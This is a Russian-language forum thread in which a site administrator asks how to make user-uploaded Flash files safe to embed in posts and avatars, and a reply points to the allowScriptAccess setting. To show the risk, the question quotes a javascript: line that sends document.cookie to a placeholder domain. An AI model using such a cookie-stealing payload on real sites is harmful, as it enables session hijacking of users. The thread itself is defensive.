| ||||||||
| ||||||||
|
|
|||||||||||||||||
|
|||||||
 |
 |
« Предыдущая тема | Следующая тема » |
| Опции темы | Опции просмотра |
|
 |
 |
14.11.2007, 22:31
|
|
||||
|
Banned
[+4 11.12.07]
[+4 18.03.08] Регистрация: Oct 2007
Сообщений: 269
|
Как проверить SWF на открытие ссылок?
Есть желание сделать вставку флеша на форуме. Как в посты, так и в аватары.
Проблема в том, что "продвинутые" пользователи могут не ограничиться красивой анимацией, а могут открывать окна с рекламой, в том числе и по таймеру, могут запускать чего-то вроде  Код:javascript:document.images[0].src="http://somedomain.com/script?"+document.cookie Вопрос: как проверить загружаемый SWF-файл, дабы в нем небыло ссылок, и вообще, был безопасным? Последний раз редактировалось LinuxVideo; 14.11.2007 в 22:33. |
|
14.11.2007, 23:13
|
|
||||
|
Et cetera
 Регистрация: Sep 2002
Сообщений: 30,787
|
Обратите внимание на параметры, указываемые в html, в особенности на allowScriptAccess.
|
|
14.11.2007, 23:45
|
|
||||
|
Banned
[+4 11.12.07]
[+4 18.03.08] Регистрация: Oct 2007
Сообщений: 269
|
AllowScriptAccesscan have two possible values: "always" and "never":
When AllowScriptAccess is "never", outbound scripting will always fail. When AllowScriptAccess is "always", outbound scripting will always succeed. Вот только интересно, волшебные ссылки "javascript:" к чему относятся? Выполняются то они локально, а вот чего дальше будет вызвано... |
|
|
Часовой пояс GMT +4, время: 10:20. |
|
|
« Предыдущая тема | Следующая тема » |
|
|
Линейный вид
